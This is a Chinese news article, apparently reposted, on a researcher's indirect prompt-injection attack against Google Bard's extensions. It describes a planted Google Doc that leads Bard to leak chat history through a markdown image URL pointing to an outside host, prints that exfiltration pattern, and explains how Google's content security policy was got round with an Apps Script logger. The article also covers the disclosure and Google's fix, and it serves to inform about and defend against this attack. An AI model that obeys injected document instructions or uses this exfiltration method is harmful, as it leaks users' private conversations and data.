您当前的位置:首页 > 电脑百科 > 人工智能

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

时间:2023-11-20 16:42:12  来源:机器之心Pro  作者:

编辑:佳琪

操控 Bard 的秘密:运用一种叫提示注入(Prompt Injection)的技术,黑客可以只使用自然语言破解人工智能系统。

大型语言模型在生成文本时非常依赖提示词。这种攻击技术对于通过提示词学习模型而言可谓是「以彼之矛,攻己之盾」,是最强长项,同时也是难以防范的软肋。

提示词分为系统指令和用户给出的指令,在自然语言中,这两者难以区分。如果用户有意在输入提示词时,模仿系统指令,那么模型可能在对话里透露一些只有它才知道的「秘密」。

提示注入攻击有多种形式,主要为直接提示注入和间接提示注入。直接提示注入指用户直接向模型输入恶意指令,试图引发意外或有害的行为。间接提示注入指攻击者将恶意指令注入到可能被模型检索或摄入的文档中,从而间接地控制或引导模型。

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

有网友使用「系统指令」引导 GPT 泄露数据

最近,谷歌 Bard 迎来了一波强大的更新,Bard 增加了拓展功能,支持访问 YouTube,搜索航班和酒店,还能查阅用户的个人文件和邮件。

除此之外,Bard 可以连接到「谷歌全家桶」,访问你的谷歌云盘、文档和邮件!但这同时意味着 Bard 将分析不受信任的数据,容易受间接提示注入的影响。也就是说,不怀好意的人可能通过向你发送电子邮件或强行分享谷歌文档进行间接的提示注入攻击,因为对方发什么样的邮件、文档给你,你是控制不了的,但 Bard 却会无差别访问。

在安全风险分析领域有着 20 年经验的前微软 Azure 安全工程师 Johann Rehberger 体验了 Bard 的全新版本,并测试了被提示注入攻击时,Bard 的数据泄漏风险。

原博客链接:

https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/?continueFlag=53578cc8c5c0a6a19c571a1fa6bcab85

Johann 首先快速验证了提示注入的可行性。他通过让 Bard 分析旧的 YouTube 视频,并使用谷歌文档进行测试测试结果显示,Bard 确实按照他的额外提示进行了操作,这证明了接下来要进行的测试的可行性。

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

Bard 的漏洞:图像 Markdown 注入

在得知 Bard 可以被提示注入后,Johann 开始了进一步的研究。

LLM 应用中的一个常见漏洞是通过渲染超链接和图像来泄露聊天历史记录。问题是,这如何适用于谷歌 Bard?

当谷歌的大模型返回文本时,它可以返回 markdown 元素,Bard 将其呈现为 html! 这包括渲染图像的功能。

想象一下谷歌的大模型返回这样的文本:

![Data Exfiltration in Progress](https://wuzzi.NET/logo.png?goog=[DATA_EXFILTRATION])

这将呈现为 HTML 图像标记,其 src 属性指向 attacker 服务器。

浏览器会自动连接到 URL,无需用户交互即可加载图片。借助 LLM 的强大功能,我们可以在聊天上下文中总结或访问以前的数据,并将其相应地附加到 URL 中。

在编写漏洞利用程序时,Johann 很快就开发出了一个提示注入有效载荷,它可以读取对话的历史记录,并形成一个包含该历史记录的超链接。然而,谷歌的内容安全策略(CSP)阻止了图像的渲染。这对攻击者来说是一个难题。

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

绕过内容安全策略

要从攻击者控制的服务器渲染图片,并不容易。谷歌的内容安全策略阻止从任意源加载图片。CSP 包含诸如 *.google.com 和 *.googleusercontent.com 之类的源,相当广泛。这意味着应该能找到一种绕过方法。

研究后,Johann 得知了 Google Apps Script,这或许可以绕过 CSP 。

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

如此一来,Bard Logger 可以在 Apps Script 中完成了。这个 Logger 将所有附加到调用 URL 的查询参数写入一个 Google Doc,而它正是外泄的目的地。

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

起初,Johann 以为这个方法并不可行,但他发现点击了几下 Apps Script 用户界面后,他找到了一个无需验证的设置。

接下来,一切准备工作就绪:

确认了谷歌 Bard 易受通过扩展程序数据间接注入提示的影响

谷歌 Bard 有允许零点击渲染图片的漏洞

一个写有提示注入指令的恶意谷歌文档

一个位于 google.com 上的日志端点,用于在图像加载时接收数据。

泄露过程

Johann 提供了他让 Bard 泄露数据的全过程。

原视频链接:

https://www.youtube.com/watch?v=CKAED_jRaxw&t=4s

首先,和 Bard 先聊一些日常:

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

用户访问一个谷歌文档(The Bard2000),这导致攻击者指令注入和图像渲染。

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

攻击者通过 Apps Script 中的脚本将数据接收到谷歌文档。

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

以下是 Johann 用于「提示注入」的谷歌文档:

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

谷歌的修复

这个安全问题已经于 2023 年 9 月 19 日报告给 Google VRP。

10 月 19 日,Johann 想要在 Ekoparty 2023 中进行演示,所以询问了关于这个漏洞的情况。Google 确认已经修复。目前还不太清楚谷歌采取了何种修复措施。但 CSP 没有修改,仍然可以渲染图像。因此,这可能是已经采取了一些过滤措施,以防止将数据插入到 URL 中。

参考链接:

https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/?continueFlag=53578cc8c5c0a6a19c571a1fa6bcab85



Tags:自然语言   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,不构成投资建议。投资者据此操作,风险自担。如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除。
▌相关推荐
谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险
编辑:佳琪操控 Bard 的秘密:运用一种叫提示注入(Prompt Injection)的技术,黑客可以只使用自然语言破解人工智能系统。大型语言模型在生成文本时非常依赖提示词。这种攻击技术对于...【详细内容】
2023-11-20  Tags: 自然语言  点击:(0)  评论:(0)  加入收藏
训练语料在自然语言处理中的重要性
自然语言处理(NaturalLanguageProcessing,NLP)是一门研究人类语言与计算机之间交互的学科,它涉及了文本分析、语义理解、机器翻译、情感分析等多个领域。在NLP的研究和应用中,训...【详细内容】
2023-11-20  Tags: 自然语言  点击:(3)  评论:(0)  加入收藏
探索GPTQ算法的威力:革新自然语言处理
自然语言处理(NaturalLanguageProcessing,简称NLP)是一门研究如何使计算机能够理解和处理人类语言的学科。近年来,随着人工智能技术的迅猛发展,GPTQ(GenerativePre-trainedTransfo...【详细内容】
2023-11-20  Tags: 自然语言  点击:(2)  评论:(0)  加入收藏
自然语言数据处理:ChatGPT与DataFocus的震撼力量
在大数据时代,自然语言处理(NLP)技术对于数据分析和商业智能应用具有重要意义。当我们将ChatGPT和DataFocus结合使用时,可以大大提高自然语言处理的效果,并为企业提供更高效、更...【详细内容】
2023-11-17  Tags: 自然语言  点击:(5)  评论:(0)  加入收藏
GPTQ算法的未来:自然语言处理的进展与挑战
自然语言处理(NaturalLanguageProcessing,NLP)是人工智能领域的重要研究方向,旨在使计算机能够理解和处理人类语言。近年来,GPTQ(GenerativePre-trainedTransformer-Q)算法作为一种...【详细内容】
2023-11-17  Tags: 自然语言  点击:(6)  评论:(0)  加入收藏
如何使用GPT作为SQL查询引擎的自然语言
译者 | 李睿审校 | 重楼如今,得益于ChatGPT这种生成式人工智能技术,使得用简单的语句查询数据集变得非常简单。与大多数生成式人工智能一样,OpenAI公司开发的API的结果仍然不完...【详细内容】
2023-10-27  Tags: 自然语言  点击:(32)  评论:(0)  加入收藏
Word2Vec:自然语言处理中的骨干算法
Word2Vec是自然语言处理领域中的骨干算法之一,它的提出不仅推动了词向量表示的研究,也对后来的各种NLP任务产生了广泛影响。本文将介绍Word2Vec的原理、算法和应用,探讨它在NLP...【详细内容】
2023-10-19  Tags: 自然语言  点击:(33)  评论:(0)  加入收藏
LSTMs:自然语言处理的新宠儿
随着深度学习的快速发展,长短期记忆网络(LongShort-Term Memory,简称LSTM)在自然语言处理(NaturalLanguage Processing,简称NLP)领域中崭露头角。作为一种特殊的循环神经网络(Recurr...【详细内容】
2023-10-19  Tags: 自然语言  点击:(50)  评论:(0)  加入收藏
微软AI客服专利获批:用自然语言处理客户遇到的问题
IT之家 10 月 12 日消息,根据国外科技媒体 WinBuzzer 报道,微软于本月获批了一项 AI 客服专利,通过自然语言可以有效处理用户问题。图源:commbox专利指出现有客服系统基本都接入...【详细内容】
2023-10-12  Tags: 自然语言  点击:(54)  评论:(0)  加入收藏
自然语言处理技术:NLP通用模型
近年来,自然语言处理(NaturalLanguage Processing,NLP)领域取得了长足的进步,其中NLP通用模型成为了关注的焦点。作为一种能够完成多个NLP任务的通用预训练语言模型,NLP通用模型...【详细内容】
2023-10-08  Tags: 自然语言  点击:(93)  评论:(0)  加入收藏
▌简易百科推荐
谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险
编辑:佳琪操控 Bard 的秘密:运用一种叫提示注入(Prompt Injection)的技术,黑客可以只使用自然语言破解人工智能系统。大型语言模型在生成文本时非常依赖提示词。这种攻击技术对于...【详细内容】
2023-11-20    机器之心Pro  Tags:自然语言   点击:(0)  评论:(0)  加入收藏
训练语料在自然语言处理中的重要性
自然语言处理(NaturalLanguageProcessing,NLP)是一门研究人类语言与计算机之间交互的学科,它涉及了文本分析、语义理解、机器翻译、情感分析等多个领域。在NLP的研究和应用中,训...【详细内容】
2023-11-20  郭亭亭    Tags:自然语言   点击:(3)  评论:(0)  加入收藏
用AI大模型「改造」QQ浏览器搜索,腾讯独家揭秘
作者:周天华、马晋、刘杰腾讯QQ浏览器搜索应用部1:引言自从搜索引擎问世以来,信息检索算法历经多次技术更迭,其演进的历程可大致归纳为四个技术代际:1.0 文本索引 ->2.0 超链分析...【详细内容】
2023-11-20    机器之心Pro  Tags:QQ浏览器   点击:(2)  评论:(0)  加入收藏
机器学习的概念和类型
1、人工智能、机器学习、深度学习之间的关系人工智能(AI)是广泛的概念,指赋予计算机智能特性。机器学习(ML)是AI的一个分支,是指通过计算机学习和改进性能。深度学习(DL)是ML的一类,...【详细内容】
2023-11-20    梯度云  Tags:机器学习   点击:(2)  评论:(0)  加入收藏
MIT学者独家撰文:ChatGPT的瓶颈与解药
| 甲子光年科技产业智库,作者|罗鸿胤,编辑|王博、苏霍伊*本文为麻省理工学院(MIT)学者罗鸿胤独家供稿,「甲子光年」经其授权后编辑发布。罗鸿胤是人工智能领域的青年科学家、MIT 计...【详细内容】
2023-11-17    甲子光年科技产业智库  Tags:ChatGPT   点击:(12)  评论:(0)  加入收藏
自然语言数据处理:ChatGPT与DataFocus的震撼力量
在大数据时代,自然语言处理(NLP)技术对于数据分析和商业智能应用具有重要意义。当我们将ChatGPT和DataFocus结合使用时,可以大大提高自然语言处理的效果,并为企业提供更高效、更...【详细内容】
2023-11-17  DataFocus    Tags:数据处理   点击:(5)  评论:(0)  加入收藏
GPTQ算法的未来:自然语言处理的进展与挑战
自然语言处理(NaturalLanguageProcessing,NLP)是人工智能领域的重要研究方向,旨在使计算机能够理解和处理人类语言。近年来,GPTQ(GenerativePre-trainedTransformer-Q)算法作为一种...【详细内容】
2023-11-17  办公小能手    Tags:算法   点击:(6)  评论:(0)  加入收藏
人机协同:探索AI与人的协作潜力及挑战
如今,人机协同在业界有着广泛的应用场景。而人机协同在业界的流行,也促使越来越多的学者关注这一领域,以探究人在AI的协助下会产生什么样的行为、决策等变化。北京大学光华管理...【详细内容】
2023-11-17  北京大学光华管理学院    Tags:AI   点击:(6)  评论:(0)  加入收藏
深度学习模型与人类认知的对比与解释
深度学习模型是近年来人工智能领域的热门研究方向,其在图像识别、自然语言处理等任务上取得了令人瞩目的成果。然而,与人类认知相比,深度学习模型仍存在一些差距。本文将探讨深...【详细内容】
2023-11-17  无心生活    Tags:深度学习   点击:(7)  评论:(0)  加入收藏
文心一言怎么使用?
在人工智能的快速发展中,深度学习是一项核心技术。深度学习是一种模仿人脑神经网络的计算模型,具有多层次的结构,通过大量数据的输入和反馈训练,使机器能够从中学习并提取特征,最...【详细内容】
2023-11-17  AI智能助手    Tags:文心一言   点击:(6)  评论:(0)  加入收藏
站内最新
站内热门
相关头条
  • · 文心一言入门教程
  • · OpenAI新功能揭秘:多模态时代的到来
  • · 百度All in的大模型何时能赚钱?
  • · 亚马逊双足机器人Digit亮相:负责回收周转箱及重复性动作
  • · 大模型搞“人肉搜索”,准确率高达95.8%!研究作者:已提醒OpenAI谷歌Meta
  • · 大模型无法替代码农!普林斯顿芝大惊人发现:GPT-4解决GitHub编程问题成功率为0
  • · AI颠覆药品研发,也可以颠覆电池?
  • · 从马赛克到高清图,AI生图能力变强了,如何取得美感与失真的平衡
  • · 开源大模型正在“杀死”闭源?
  • · BBC 阻止 OpenAI 抓取数据,但对人工智能用于新闻持开放态度
  • · 能听会说,ChatGPT开启新一轮AI助理竞赛
  • · 多模态大模型最全综述来了!7位微软研究员大力合作,5大主题,成文119页
  • · OpenAI扔出DALL·E 3!能画画的ChatGPT要来了:简单提示,讲出“超级向日葵刺猬”连环画
  • · 17名医生都没能诊断出的病,竟被ChatGPT破解,AI医疗的潜力有多大?
  • · 老板也怕AI抢饭碗?调查:一半CEO认为AI可以取代自己工作
  • · GPT-4终结人工标注!AI标注比人类标注效率高100倍,成本仅1/7
  • · “AI换脸”或可预防?一起来看高科技如何“打败”高科技
  • · 谷歌掌门人畅谈AI:为何“动作慢了” 对人工智能有何担忧?
  • · 从AI模特换装到AIGC赋能运营,生成式AI全方位渗透电商产业链
  • · 微软高估了Bing,低估了Open AI
  • 站内头条